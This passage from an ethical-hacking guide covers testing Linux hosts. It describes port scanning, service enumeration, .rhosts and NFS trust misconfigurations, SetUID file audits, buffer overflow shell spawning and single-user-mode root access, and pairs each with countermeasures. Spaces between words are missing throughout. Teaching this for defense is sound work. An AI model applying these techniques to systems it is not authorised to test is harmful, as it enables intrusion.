YoucanalsouseMicrosoftBaselineSecurityAnalyzer(MBSA)tocheckforbasicvulnerabilitiesandmissingpatches.MBSAisafreeutilityfromMicrosoftthatyoucandownloadatwww.microsoft.com/technet/security/tools/mbsahome.mspx.MBSAchecksallWindowsXPandlater(Windows10isnotyetsupported)operatingsystemsformissingpatches.ItalsotestsWindows,SQLServer,Office,andIISforbasicsecuritysettings,suchasweakpasswords.Youcanusetheseteststoidentifysecurityweaknessesinyoursystems.

WithMBSA,youcanscaneitherthelocalsystemyou’reloggedintoorcomputersacrossthenetwork.Onecaveat:MBSArequiresanadministratoraccountonthelocalmachinesyou’rescanning.

http://www.microsoft.com/technet/security/tools/mbsahome.mspx

Chapter13

LinuxInThisChapter

ExaminingLinuxhackingtools

PortscanningLinuxhosts

GleaningLinuxinformationwithoutloggingin

ExploitingcommonvulnerabilitieswhenloggedintoLinux

MinimizingLinuxsecurityrisks

Linuxhasn’tmadeinroadsontotheenterprisedesktopthewaythatWindowshas,butLinuxstillhasitspresenceinpracticallyeverynetworknonetheless.AcommonmisconceptionisthatLinuxismoresecurethanWindows.However,moreandmore,LinuxanditssistervariantsofUNIXarepronetosomeofthesametypesofsecurityvulnerabilities,soyoucan’tletyourguarddown.

HackersareattackingLinuxindrovesbecauseofitspopularityandgrowingusageintoday’snetworkenvironment.BecausesomeversionsofLinuxarefree—inthesensethatyoudon’thavetopayforthebaseoperatingsystem—manyorganizationsareinstallingLinuxfortheirwebserversande-mailserversinhopesofsavingmoneyandhavingamoresecuresystem.Linuxhasgrowninpopularityforotherreasonsaswell,includingthefollowing:

Abundantresourcesareavailable,includingbooks,websites,anddeveloperandconsultantexpertise.There’salowerriskthatLinuxwillbehitwithasmuchmalwareasWindowsanditsapplicationshavetodealwith.Linuxexcelswhenitcomestosecurity,butitprobablywon’tstaythatway.Therehasbeenincreasedbuy-infromotherUNIXvendors,includingIBM,HP,andOracle.UNIXandLinuxhavebecomeincreasinglyeasiertouse.

WorkstationoperatingsystemssuchasMacOSXandChromeOSarebecomingmainstreaminbusinesstoday.TheseOSsarebasedonUNIX/LinuxcoresandaresusceptibletomanyoftheLinuxflawsIdiscussinthischapter.Therefore,theyneedtobeincludedinthescopeofyoursecuritytests.

Inmyownsecurityassessmentwork,I’mnotseeingmanyglaringChromeOS-basedvulnerabilities(yet),butIamseeingweaknessesinMacOSX,especiallyasitinvolvesthird-partysoftwarethatcanbeexploitedbymalwareandeventoolssuchas

Metasploit.Iseesuchflawsmoreoftenwhenperformingauthenticatedscanssomakesureyou’redoingthoseaswell.

BasedonwhatIseeinmywork,Linuxislessvulnerabletocommonsecurityflaws—especiallyasitrelatestomissingthird-partypatchesforAdobe,Java,andthelike—thanWindows.WhencomparinganycurrentdistributionofLinux,suchasUbuntuandRedHat/Fedora,withWindows7orWindows10,ItendtofindmoreweaknessesintheWindowssystems.Chalkituptowidespreaduse,morefeatures,oruneducatedusers,butthereseemstobealotmorethatcanhappeninaWindowsenvironment.Thatsaid,Linuxiscertainlynotflawless.InadditiontothepasswordattacksIcoverinChapter8,certainremoteandlocalattacksarepossibleagainstLinux-basedsystems.Inthischapter,IshowyousomesecurityissuesintheLinuxoperatingsystemandoutlinesomecountermeasurestoplugtheholessoyoucankeepthebadguysout.Don’tletthetitleofthischapterfoolyou—alotofthisinformationappliestoallflavorsofUNIX.

UnderstandingLinuxVulnerabilitiesVulnerabilitiesandattacksagainstLinuxarecreatingbusinessrisksinagrowingnumberoforganizations—especiallye-commercecompanies,networkandIT/securityvendors,andcloudserviceprovidersthatrelyonLinuxformanyoftheirsystems,includingtheirownproducts.WhenLinuxsystemsarehacked,thevictimorganizationscanexperiencethesamesideeffectsastheirWindows-usingcounterparts,including:

LeakageofsensitiveinformationCrackedpasswordsCorruptedordeleteddatabasesSystemstakencompletelyoffline

ChoosingToolsYoucanusemanyLinux-basedsecuritytoolstotestyourLinuxsystems.Somearemuchbetterthanothers.IoftenfindthatmyWindows-basedcommercialtoolsdoasgoodajobasany.Myfavoritesareasfollows:

KaliLinux(www.kali.org)toolsetonabootableDVDor.isoimagefileLanGuard(www.gfi.com/products-and-solutions/network-security-solutions/gfi-languard)forportscanning,OSenumeration,andvulnerabilitytestingNetScanToolsPro(www.netscantools.com)forportscanning,OSenumeration,andmuchmore

Nexpose(www.rapid7.com/products/nexpose)fordetailedportscanning,OSenumeration,andvulnerabilitytesting

AtoolsuchasNexposecanperformthemajorityofthesecuritytestingneededtofindflawsinLinux.AnotherpopularcommercialalternativeisofferedbyQualys(www.qualys.com).

Nmap(https://nmap.org)forOSfingerprintinganddetailedportscanningNessus(www.tenable.com/products/nessus-vulnerability-scanner.forOSfingerprinting,portscanning,andvulnerabilitytesting

ManyotherLinuxhackingandtestingtoolsareavailableonsuchsitesasSourceForge.net(http://sourceforge.net)andfreecode.com(http://freecode.com).Thekeyistofindasetoftools—preferablyasfewaspossible—thatcandothejobthatyouneedtodoandthatyoufeelcomfortableworkingwith.

http://www.kali.org




http://www.qualys.com

https://nmap.org

http://www.tenable.com/products/nessus-vulnerability-scanner

http://sourceforge.net/

http://freecode.com/

GatheringInformationAboutYourLinuxVulnerabilities

YoucanscanyourLinux-basedsystemsandgatherinformationfrombothoutside(ifthesystemisapublicly-accessiblehost)andinsideyournetwork.Thatway,youcanseewhatthebadguysseefrombothdirections.

SystemscanningLinuxservices—calleddaemons—aretheprogramsthatrunonasystemandserveupvariousservicesandapplicationsforusers.

Internetservices,suchastheApachewebserver(httpd),telnet(telnetd),andFTP(ftpd),oftengiveawaytoomuchinformationaboutthesystem,includingsoftwareversions,internalIPaddresses,andusernames.Thisinformationcouldallowhackerstoexploitaknownweaknessinthesystem.TCPandUDPsmallservices,suchasecho,daytime,andchargen,areoftenenabledbydefaultanddon’tneedtobe.

ThevulnerabilitiesinherentinyourLinuxsystemsdependonwhatservicesarerunning.Youcanperformbasicportscanstogleaninformationaboutwhat’srunning.

TheNetScanToolsProresultsinFigure13-1showmanypotentiallyvulnerableservicesonthisLinuxsystem,includingtheconfirmedservicesofSSH,HTTP,andHTTPS.

Figure13-1:PortscanningaLinuxhostwithNetScan-ToolsPro.

InadditiontoNetScanToolsPro,youcanrunanotherscanner,suchasNexpose,againstthesystemtotrytogathermoreinformation,includingaserverrunningSSLversion3withweakencryptionciphers,asshowninFigure13-2.

Figure13-2:UsingNexposetodiscovervulnerabilitieswithSSL.

Keepinmindthatyou’regoingtofindthemostvulnerabilitiesinLinuxandMacOSXbyperformingauthenticatedvulnerabilityscans.Thisisparticularlyimportanttodobecauseitshowsyouwhat’sexploitablebyusers—ormalware—onyoursystems.And,yes,evenLinuxandMacOSXaresusceptibletomalware!You’llwanttorunsuchscansatleastonceperyearorafteranymajorapplicationorOSupgradesonyourworkstationsandservers.

Figure13-3showstheabsolutelyamazingfeatureinNexposethatallowsyoutoactuallytestyourlogincredentialsbeforekickingoffavulnerabilityscanofyournetwork.

Figure13-3:UsingtheTestCredentialsfeatureaspartoftheNexposescanconfiguration.

What’sthebigdealaboutthisfeature,yousay?Well,firstoff,itcanbeawholelotofhassletothinkyou’reenteringtheproperlogincredentialsintothescanneronlytofindouthourslaterthattheloginswerenotsuccessful,whichcaninvalidatethescanyouran.Itcanalsobeathreattoyourbudget(orwallet,ifyouworkforyourself)ifyou’rechargedbythescanonlytodiscoverthatyouhavetore-scanhundreds,eventhousands,ofnetworkhosts.I’vebeendownthatroadmanytimesandit’sarealpain,tosaytheleast.

YoucanusefreetoolstogoastepfurtherandfindouttheexactdistributionandkernelversionbyrunninganOSfingerprintscanwiththeNmapcommandnmap–sV–O,asshowninFigure13-4.

Figure13-4:UsingNmaptodeterminetheOSkernelversionofaLinuxserver.

TheWindows-basedNetScanToolsProalsohasthecapabilitytodeterminetheversionofLinuxthat’srunning,asshowninFigure13-5.

Figure13-5:UsingNetScan-ToolsProtodeterminethatSlackwareLinuxislikelyrunning.

CountermeasuresagainstsystemscanningAlthoughyoucan’tcompletelypreventsystemscanning,youcanstillimplementthefollowingcountermeasurestokeepthebadguysfromgleaningtoomuchinformationaboutyoursystemsandusingitagainstyousomehow:

Protectthesystemswitheither:Afirewall,suchasiptables,that’sbuiltintotheOSAhost-basedintrusionpreventionsystem,suchasPortSentry(http://sourceforge.net/projects/sentrytools),alocalagentsuchasSnare(www.intersectalliance.com/our-product/snare-agent),orMcAfeeHostIntrusionPreventionforServer(www.mcafee.com/us/products/host-ips-for-server.aspx)thattiesintoalargersecurityincidentandeventmanagement(SIEM)systemthatmonitorsforandcorrelatesnetworkevents,anomalies,andbreaches.

Disabletheservicesyoudon’tneed,includingRPC,HTTP,FTP,telnet,andthesmallUDPandTCPservices—anythingforwhichyoudon’thaveatruebusinessneed.Thiskeepstheservicesfromshowingupinaportscan,whichgivesanattackerlessinformation—andpresumablylessincentive—tobreakintoyoursystem.Makesurethelatestsoftwareupdatesareinstalledtoreducethechanceofexploitationifanattackerdetermineswhatservicesyou’rerunning.

http://sourceforge.net/projects/sentrytools/

https://www.intersectalliance.com/our-product/snare-agent/

http://www.mcafee.com/us/products/host-ips-for-server.aspx

FindingUnneededandUnsecuredServicesWhenyouknowwhichdaemonsandapplicationsarerunning—suchasFTP,telnet,andawebserver—it’snicetoknowexactlywhichversionsarerunningsoyoucanlookuptheirassociatedvulnerabilitiesanddecidewhethertoturnthemoff.TheNationalVulnerabilityDatabasesite(http://nvd.nist.gov)isagoodresourceforlookingupvulnerabilities.

SearchesSeveralsecuritytoolscanhelpuncovervulnerabilitiesinyourLinuxsystems.Thesetoolsmightnotidentifyallapplicationsdowntotheexactversionnumber,butthey’reaverypowerfulwayofcollectingsysteminformation.

VulnerabilitiesBeespeciallymindfulofthesecommonsecurityweaknessesinLinuxsystems:

AnonymousFTP—especiallyifitisn’tproperlyconfigured—canprovideawayforanattackertodownloadandaccessfilesonyoursystem.TelnetandFTParevulnerabletonetworkanalyzercapturesofthecleartextuserIDandpasswordtheapplicationsuse.Theirloginscanalsobebrute-forced.OldversionsofsendmailandOpenSSLhavemanysecurityissues,includingdenialofserviceflawsthatcantakesystemsoffline.R-services,suchasrlogin,rdist,rexecd,rsh,andrcp,areespeciallyvulnerabletoattackswhichrelyontrust.

ManywebserversrunonLinux,soyoucan’toverlooktheimportanceofcheckingforweaknessesinApacheaswellasTomcatorotherapplications.Forexample,acommonLinuxvulnerabilityisthatusernamescanbedeterminedviaApachewhenitdoesn’thavetheUserDirdirectivedisabledinitshttpd.conffile.Youcanexploitthisweaknessmanuallybybrowsingtowell-knownuserfolders,suchashttp://www.your~site.com/user_nameor,betteryet,byusingavulnerabilityscanner,suchasAppSpider(www.rapid7.com/products/appspider)orNexpose,toautomaticallyenumeratethesystem.Eitherway,youmaybeabletofindoutwhichLinuxusersexistandthenlaunchawebpasswordcrackingattack.Therearealsowaystoaccesssystemfiles(including/etc/passwd)viavulnerableCGIandPHPcode.IcoverhackingwebapplicationsinChapter15.

Likewise,FTPisoftenrunningunsecuredonLinuxsystems.I’vefoundLinuxsystemswithanonymousFTPenabledthatweresharingsensitivehealthcareandfinancialinformationtoeveryoneonthelocalnetwork.Talkaboutalackofaccountability!So,don’tforgettolookforthesimplestuff.WhentestingLinux,youcandigdowndeepintothekernelanddothisorthattocarryoutsomeuber-complexexploit,butit’susuallythelittlethingsthatgetyou.I’vesaiditbefore,anditdeservesmentioning


http://www.yoursite.com/user_name


again,lookforthelow-hangingfruitonyournetworkasthatisthestuffthatwillgetyouintothemosttroublethequickest.

AnonymousFTPisoneofthemostcommonvulnerabilitiesIfindinLinux.IfyoumustrunanFTPserver,makesureit’snotsharingoutsensitiveinformationtoallofyourinternalnetworkusers,orworse,theentireworld.Inmywork,IseetheformerquiteoftenandthelatterperiodicallywhichismorethanIevershould.

ToolsThefollowingtoolscanperformmorein-depthinformationbeyondportscanningtoenumerateyourLinuxsystemsandseewhatotherscansee:

Nmapcancheckforspecificversionsoftheservicesloaded,asshowninFigure13-6.SimplyrunNmapwiththe-sVcommand-lineswitch.netstatshowstheservicesrunningonalocalmachine.Enterthiscommandwhileloggedin:

netstat–anp

ListOpenFiles(lsof)displaysprocessesthatarelisteningandfilesthatareopenonthesystem.

Torunlsof,loginandenterthiscommandataLinuxcommandprompt:lsof.Therearetonsofoptionsavailablevialsof–h,suchaslsof–I+D/var/logtoshowwhichlogfilesarecurrentlyinuseoverwhichnetworkconnections.Thelsofcommandcancomeinhandywhenyoususpectthatmalwarehasfounditswayontothesystem.

Figure13-6:UsingNmaptocheckapplicationversions.

CountermeasuresagainstattacksonunneededservicesYoucanandshoulddisabletheunneededservicesonyourLinuxsystems.ThisisoneofthebestwaystokeepyourLinuxsystemsecure.Likereducingthenumberofentrypoints(suchasopendoorsandwindows)intoyourhouse,themoreentrypointsyoueliminate,thefewerplacesanintrudercanbreakin.

DisablingunneededservicesThebestmethodofdisablingunneededservicesdependsonwhetherthedaemonisloadedinthefirstplace.Youhaveseveralplacestodisableservices,dependingontheversionofLinuxyou’rerunning.

Ifyoudon’tneedtorunaparticularservice,takethesaferoute:Turnitoff!Justgivepeopleonthenetworkamplewarningthatit’sgoingtohappenintheeventsomeoneneedstheservicefortheirwork.

inetd.conf(orxinetd.conf)

Ifitmakesgoodbusinesssense—thatis,ifyoudon’tneedthem—disableunneededservicesbycommentingouttheloadingofdaemonsyoudon’tuse.Followthesesteps:

1. EnterthefollowingcommandattheLinuxprompt:ps-aux

TheprocessID(PID)foreachdaemon,includinginetd,islistedonthescreen.InFigure13-7,thePIDforthesshd(SecureShelldaemon)is646.

2. MakenoteofthePIDforinetd.3. Open/etc/inetd.confintheLinuxtexteditorvibyenteringthefollowing

command:vi/etc/inetd.conf

Or/etc/xinetd.conf

4. Whenyouhavethefileloadedinvi,enabletheinsert(edit)modebypressingI.

5. Movethecursortothebeginningofthelineofthedaemonthatyouwanttodisable,suchashttpd(webserverdaemon),andtype#atthebeginningoftheline.

Thisstepcommentsoutthelineandpreventsitfromloadingwhenyoureboottheserverorrestartinetd.It’salsogoodforrecordkeepingandchangemanagement.

6. Toexitviandsaveyourchanges,pressEsctoexittheinsertmode,type:wq,

andthenpressEnter.

Thistellsvithatyouwanttowriteyourchangesandquit.

7. RestartinetdbyenteringthiscommandwiththeinetdPID:kill–HUPPID

Figure13-7:ViewingtheprocessIDsforrunningdaemonsbyusingps-aux.

chkconfig

Ifyoudon’thaveaninetd.conffile(orit’sempty),yourversionofLinuxisprobablyrunningthexinetdprogram—amoresecurereplacementforinetd—tolistenforincomingnetworkapplicationrequests.Youcaneditthe/etc/xinetd.conffileifthisisthecase.Formoreinformationontheusageofxinetdandxinetd.conf,entermanxinetdormanxinetd.confataLinuxcommandprompt.Ifyou’rerunningRedHat7.0orlater,youcanrunthe/sbin/chkconfigprogramtoturnoffthedaemonsyoudon’twanttoload.

Youcanalsoenterchkconfig—listatacommandprompttoseewhatservicesareenabledinthexinetd.conffile.

Ifyouwanttodisableaspecificservice,saysnmp,enterthefollowing:chkconfig--delsnmpd

Youcanusethechkconfigprogramtodisableotherservices,suchasFTP,telnet,andwebserver.

AccesscontrolTCPWrapperscancontrolaccesstocriticalservicesthatyourun,suchasFTPorHTTP.ThisprogramcontrolsaccessforTCPservicesandlogstheirusage,helpingyou

controlaccessviahostnameorIPaddressandtrackmaliciousactivities.

YoucanfindmoreinformationaboutTCPWrappersfromftp://ftp.porcupine.org/pub/security/index.html.

Alwaysmakesurethatyouroperatingsystemandtheapplicationsrunningonitarenotopentotheworld(oryourinternalnetworkwherethatmightmatter)byensuringthatreasonablepasswordrequirementsareinplace.Don’tforgettodisableanonymousFTPunlessyouabsolutelyneedit.Evenifyoudo,limitsystemaccesstoonlythosewithabusinessneedtoaccesssensitiveinformation.

ftp://ftp.porcupine.org/pub/security/index.html

Securingthe.rhostsandhosts.equivFilesLinux—andalltheflavorsofUNIX—arefile-basedoperatingsystems.Practicallyeverythingthat’sdoneonthesysteminvolvesthemanipulationoffiles.ThisiswhysomanyattacksagainstLinuxareatthefilelevel.

Hacksusingthehosts.equivand.rhostsfilesIfhackerscancaptureauserIDandpasswordbyusinganetworkanalyzerorcancrashanapplicationandgainrootaccessviaabufferoverflow,onethingtheylookforiswhatusersaretrustedbythelocalsystem.That’swhyit’scriticaltoassessthesefilesyourself.The/etc/hosts.equivand.rhostsfileslistthisinformation.

hosts.equivThe/etc/hosts.equivfilewon’tgiveawayrootaccessinformation,butitdoesspecifywhichaccountsonthesystemcanaccessservicesonthelocalhost.Forexample,iftribewerelistedinthisfile,allusersonthetribesystemwouldbeallowedaccess.Aswiththe.rhostsfile,externalhackerscanreadthisfileandthenspooftheirIPaddressandhostnametogainunauthorizedaccesstothelocalsystem.Attackerscanalsousethenameslocatedinthe.rhostsandhosts.equivfilestolookfornamesofothercomputerstoexploit.

.rhostsThehighly-important$home/.rhostsfilesinLinuxspecifywhichremoteuserscanaccesstheBerkeleySoftwareDistribution(BSD)r-commands(suchasrsh,rcp,andrlogin)onthelocalsystemwithoutapassword.Thisfileisinaspecificuser’s(includingroot)homedirectory,suchas/home/jsmith.A.rhostsfilemaylooklikethis:

tribescott

tribeeddie

ThisfileallowsusersScottandEddieontheremote-systemtribetologintothelocalhostwiththesameprivilegesasthelocaluser.Ifaplussign(+)isenteredintheremote-hostanduserfields,anyuserfromanyhostcouldlogintothelocalsystem.Thehackercanaddentriesintothisfilebyusingeitherofthesetricks:

ManuallymanipulatingthefileRunningascriptthatexploitsanunsecuredCommonGatewayInterface(CGI)scriptonaweb-serverapplicationthat’srunningonthesystem

Thisconfigurationfileisaprimetargetforamaliciousattack.OnmostLinuxsystemsI’vetested,thesefilesaren’tenabledbydefault.However,ausercancreateoneinhisorherhomedirectoryonthesystem—intentionallyoraccidentally—whichcancreateamajorsecurityholeonthesystem.

Countermeasuresagainst.rhostsandhosts.equiv

fileattacksUsebothofthefollowingcountermeasurestopreventhackerattacksagainstthe.rhostsandhosts.equivfilesinyourLinuxsystem.

DisablingcommandsAgoodwaytopreventabuseofthesefilesistodisabletheBSDr-commands.Thiscanbedoneintwoways:

Commentoutthelinesstartingwithshell,login,andexecininetd.conf.Edittherexec,rlogin,andrshfileslocatedinthe/etc/xinetd.ddirectory.Openeachfileinatexteditorandchangedisable=notodisable=yes,asshowninFigure13-8.

Figure13-8:Therexecfileshowingthedisableoption.

InRedHatEnterpriseLinux,youcandisabletheBSDr-commandswiththesetupprogram:

1. Entersetupatacommandprompt.2. Entersystem-config-services.3. SelecttheappropriateservicesandclickDisable.

BlockingaccessAcoupleofcountermeasurescanblockrogueaccessofthe.rhostsandhosts.equivfiles:

Blockspoofedaddressesatthefirewall,asIoutlineinChapter9.Setthereadpermissionsforeachfile’sowneronly.

.rhosts:Enterthiscommandineachuser’shomedirectory:

chmod600.rhosts

hosts.equiv:Enterthiscommandinthe/etcdirectory:chmod600hosts.equiv

YoucanalsouseOpenSourceTripwire(http://sourceforge.net/projects/tripwire)tomonitorthesefilesandalertyouwhenaccessisobtainedorchangesaremade.

http://sourceforge.net/projects/tripwire/

AssessingtheSecurityofNFSTheNetworkFileSystem(NFS)isusedtomountremotefilesystems(similartosharesinWindows)fromthelocalmachine.GiventheremoteaccessnatureofNFS,itcertainlyhasitsfairshareofhacks.IcoveradditionalstoragevulnerabilitiesandhacksinChapter16.

NFShacksIfNFSwassetupimproperlyoritsconfigurationhasbeentamperedwith—namely,the/etc/exportsfilecontainingasettingthatallowstheworldtoreadtheentirefilesystem—remotehackerscaneasilyobtainremoteaccessanddoanythingtheywantonthesystem.Assumingnoaccesscontrollist(ACL)isinplace,allittakesisaline,suchasthefollowing,inthe/etc/exportsfile:

/rw

Thislinesaysthatanyonecanremotelymounttherootpartitioninaread-writefashion.Ofcourse,thefollowingconditionsmustalsobetrue:

TheNFSdaemon(nfsd)mustberunning,alongwiththeportmapdaemonthatwouldmapNFStoRPC.ThefirewallmustallowtheNFStrafficthrough.TheremotesystemsthatareallowedintotheserverrunningtheNFSdaemonmustbeplacedintothe/etc/hosts.allowfile.

Thisremote-mountingcapabilityiseasytomisconfigure.It’softenrelatedtoaLinuxadministrator’smisunderstandingofwhatittakestoshareouttheNFSmountsandresortingtotheeasiestwaypossibletogetitworking.Ifsomeonecangainremoteaccess,thesystemistheirs.

CountermeasuresagainstNFSattacksThebestdefenseagainstNFShackingdependsonwhetheryouactuallyneedtheservicerunning.

Ifyoudon’tneedNFS,disableit.IfyouneedNFS,implementthefollowingcountermeasures:

FilterNFStrafficatthefirewall—typically,UDPport111(theportmapperport)ifyouwanttofilterallRPCtraffic.AddnetworkACLstolimitaccesstospecifichosts.Makesurethatyour/etc/exportsand/etc/hosts.allowfilesareconfiguredproperlytokeeptheworldoutsideyournetwork.

CheckingFilePermissionsInLinux,specialfiletypesallowprogramstorunwiththefileowner’srights:

SetUID(foruserIDs)SetGID(forgroupIDs)

SetUIDandSetGIDarerequiredwhenauserrunsaprogramthatneedsfullaccesstothesystemtoperformitstasks.Forexample,whenauserinvokesthepasswdprogramtochangehisorherpassword,theprogramisactuallyloadedandrunwithoutrootoranyotheruser’sprivileges.Thisisdonesothattheusercanruntheprogramandtheprogramcanupdatethepassworddatabasewithouttherootaccountbeinginvolvedintheprocess.

FilepermissionhacksBydefault,rogueprogramsthatrunwithrootprivilegescanbeeasilyhidden.Anexternalattackerormaliciousinsidermightdothistohidehackingfiles,suchasrootkits,onthesystem.ThiscanbedonewithSetUIDandSetGIDcodingintheirhackingprograms.

CountermeasuresagainstfilepermissionattacksYoucantestforrogueprogramsbyusingbothmanualandautomatedtestingmethods.

ManualtestingThefollowingcommandscanidentifyandprinttothescreenSetUIDandSetGIDprograms:

ProgramsthatareconfiguredforSetUID:find/-perm-4000–print

ProgramsthatareconfiguredforSetGID:find/-perm-2000–print

Filesthatarereadablebyanyoneintheworld:find/-perm-2-typef–print

Hiddenfiles:find/-name".*"

Youprobablyhavehundredsoffilesineachofthesecategories,sodon’tbealarmed.Whenyoudiscoverfileswiththeseattributesset,youneedtomakesurethattheyareactuallysupposedtohavethoseattributesbyresearchinginyourdocumentationorontheInternet,orbycomparingthemtoaknownsecuresystemordatabackup.

KeepaneyeonyoursystemstodetectanynewSetUIDorSetGIDfilesthatsuddenlyappear.

AutomatictestingYoucanuseanautomatedfilemodificationauditingprogramtoalertyouwhenthesetypesofchangesaremade.ThisiswhatIrecommend—it’saloteasieronanongoingbasis:

Achange-detectionapplication,suchasOpenSourceTripwire,canhelpyoukeeptrackofwhatchangedandwhen.Afile-monitoringprogram,suchasCOPS(pointyourwebbrowsertoftp://ftp.cerias.purdue.edu/pub/tools/unix/scanners/cops),findsfilesthathavechangedinstatus(suchasanewSetUIDorremovedSetGID).

ftp://ftp.cerias.purdue.edu/pub/tools/unix/scanners/cops

FindingBufferOverflowVulnerabilitiesRPCandothervulnerabledaemonsarecommontargetsforbuffer-overflowattacks.Bufferoverflowattacksareoftenhowthehackercangetintomodifysystemfiles,readdatabasefiles,andmore.

AttacksInabufferoverflowattack,theattackereithermanuallysendsstringsofinformationtothevictimLinuxmachineorwritesascripttodoso.Thesestringscontainthefollowing:

Instructionstotheprocessortobasicallydonothing.Maliciouscodetoreplacetheattackedprocess.Forexample,exec(“/bin/sh”)createsashellcommandprompt.Apointertothestartofthemaliciouscodeinthememorybuffer.

Ifanattackedapplication(suchasFTPorRPC)isrunningasroot(certainprogramsdo),thissituationcangiveattackersrootpermissionsintheirremoteshells.SpecificexamplesofvulnerablesoftwarerunningonLinuxareSamba,MySQL,andFirefox.Dependingontheversion,thissoftwarecanbeexploitedusingcommercialorfreetoolssuchasMetasploit(www.metasploit.com)toobtainremotecommandprompts,addbackdooruseraccounts,changeownershipoffiles,andmore.IcoverMetasploitinChapter12.

CountermeasuresagainstbufferoverflowattacksThreemaincountermeasurescanhelppreventbuffer-overflowattacks:

Disableunneededservices.ProtectyourLinuxsystemswitheitherafirewallorahost-basedintrusionpreventionsystem(IPS).

Enableanotheraccesscontrolmechanism,suchasTCPWrappers,thatauthenticatesuserswithapassword.

Don’tjustenableaccesscontrolsviaanIPaddressorhostname.Thatcaneasilybespoofed.

Asalways,makesurethatyoursystemshavebeenupdatedwiththelatestkernelandsoftwareupdates.


CheckingPhysicalSecuritySomeLinuxvulnerabilitiesinvolvethebadguyactuallybeingatthesystemconsole—somethingthat’sentirelypossiblegiventheinsiderthreatsthateveryorganizationfaces.

PhysicalsecurityhacksIfanattackerisatthesystemconsole,anythinggoes,includingrebootingthesystem(evenifnooneisloggedin)bypressingCtrl+Alt+Delete.Afterthesystemisrebooted,theattackercanstartitinsingle-usermode,whichallowsthehackertozeroouttherootpasswordorpossiblyevenreadtheentireshadowpasswordfile.IcoverpasswordcrackinginChapter8.

CountermeasuresagainstphysicalsecurityattacksEdityour/etc/inittabfileandcommentout(placea#signinfrontof)thelinethatreadsca::ctrlaltdel:/sbin/shutdown-t3-rnow,showninthelastlineofFigure13-9.ThesechangeswillpreventsomeonefromrebootingthesystembypressingCtrl+Alt+Delete.BeforewarnedthatthiswillalsopreventyoufromlegitimatelyusingCtrl+Alt+Delete.

Figure13-9:/etc/inittabshowingthelinethatallowsaCtrl+Alt+Deleteshutdown.

ForLinux-basedlaptops,usediskencryptionsoftware,suchasWinMagic(www.winmagic.com)andSymantec(www.symantec.com).Ifyoudon’t,whenalaptopislostorstolen,youcouldverywellhaveadatabreachonyourhandsandallthestate,federal,compliance,anddisclosurelawrequirementsthatgoalongwithit.Notgood!

http://www.winmagic.com

http://www.symantec.com

Ifyoubelievethatsomeonehasrecentlygainedaccesstoyoursystem,eitherphysicallyorbyexploitingavulnerability,suchasaweakpasswordorbufferoverflow,youcanuselast,theprogram,toviewthelastfewloginsintothesystemtocheckforstrangeloginIDsorlogintimes.Thisprogramperusesthe/var/log/wtmpfileanddisplaystheuserswhologgedinlast.Youcanenterlast|headtoviewthefirstpartofthefile(thefirsttenlines)ifyouwanttoseethemostrecentlogins.

PerformingGeneralSecurityTestsYoucanassesscritical,andoftenoverlooked,securityissuesonyourLinuxsystems,suchasthefollowing:

Misconfigurationsorunauthorizedentriesintheshadowpasswordfiles,whichcouldprovidecovertsystemaccessPasswordcomplexityrequirementsUsersequivalenttorootSuspiciousautomatedtasksconfiguredincron,thescriptschedulerprogramSignaturechecksonsystembinaryfilesChecksforrootkitsNetworkconfiguration,includingmeasurestopreventpacketspoofingandotherdenialofservice(DoS)attacksPermissionsonsystemlogfiles

Youcandoalltheseassessmentsmanually—orbetteryet,useanautomatedtooltodoitforyou!Figure13-10showstheinitiationoftheTigersecurity-auditingtool(www.nongnu.org/tiger),andFigure13-11showsaportionoftheauditresults.Talkaboutsomegreatbangfornobuckwiththistool!

Figure13-10:RunningtheTigersecurity-auditingtool.

http://www.nongnu.org/tiger/

Figure13-11:PartialoutputoftheTigertool.

AlternativestoTigerincludeLinuxSecurityAuditingTool(LSAT;http://usat.sourceforge.net)aswellasBastilleUNIX(http://bastille-linux.sourceforge.net).

http://usat.sourceforge.net/

http://bastille-linux.sourceforge.net/

PatchingLinuxOngoingpatchingisperhapsthebestthingyoucandotoenhanceandmaintainthesecurityofyourLinuxsystems.RegardlessoftheLinuxdistributionyouuse,usingatooltoassistinyourpatchingeffortsmakesyourjobaloteasier.

IoftenfindLinuxiscompletelyoutofthepatchmanagementloop.WiththefocusonpatchingWindows,manynetworkadministratorsforgetabouttheLinuxsystemstheyhaveontheirnetwork.Don’tfallintothistrap.

DistributionupdatesThedistributionprocessisdifferentoneverydistributionofLinux.Youcanusethefollowingtools,basedonyourspecificdistribution:

RedHat:ThefollowingtoolsupdateRedHatLinuxsystems:RPMPacketManager,whichistheGUI-basedapplicationthatrunsintheRedHatGUIdesktop.Itmanagesfileswithan.rpmextensionthatRedHatandotherfreewareandopensourcedevelopersusetopackagetheirprograms.RPMPacketManagerwasoriginallyaRedHat-centricsystembutisnowavailableonmanyversionsofLinux.up2date,acommand-line,text-basedtoolthat’sincludedinRedHat,Fedora,andCentOS.

Debian:YoucanusetheDebianpackagemanagementsystem(dpkg)includedwiththeoperatingsystemtoupdateDebianLinuxsystems.Slackware:YoucanusetheSlackwarePackageTool(pkgtool)includedwiththeoperatingsystemtoupdateSlackwareLinuxsystems.SUSE:SUSELinuxincludesYaST2softwaremanagement.

InadditiontoLinuxkernelandgeneraloperatingsystemupdates,makesureyoupayattentiontoApache,OpenSSL,OpenSSH,MySQL,PHP,andothersoftwareonyoursystems.Theymayhaveweaknessesthatyoudon’twanttooverlook.

Multi-platformupdatemanagersCommercialtoolshaveadditionalfeatures,suchascorrelatingpatcheswithvulnerabilitiesandautomaticallydeployingappropriatepatches.CommercialtoolsthatcanhelpwithLinuxpatchmanagementincludeManageEngine(www.manageengine.com/products/desktop-central/linux-management.html),GFI

https://www.manageengine.com/products/desktop-central/linux-management.html

LanGuard(www.gfi.com/products-and-solutions/network-security-solutions/gfi-languard/specifications/patch-management-for-operating-

systems),andDellKACESystemsManagementAppliance(http://software.dell.com/products/kace-k1000-systems-management-appliance/patch-management-security.aspx).

http://www.gfi.com/products-and-solutions/network-security-solutions/gfi-languard/specifications/patch-management-for-operating-systems

http://software.dell.com/products/kace-k1000-systems-management-appliance/patch-management-security.aspx

HackingApplications

ReadevenmoregreatDummiescontentatwww.dummies.com/extras/hacking.


Inthispart…Well,thisbookhascoveredalltheessentialsecuritytestsfromthenontechnicaltothenetworkandontomobiledevicesandoperatingsystems.WhatIhaven’tyetcoveredaretheapplicationsthatrunontopofallthisaswellasdatabaseserversandstoragesystemsthatensurethedataisavailablewhenweneedit.

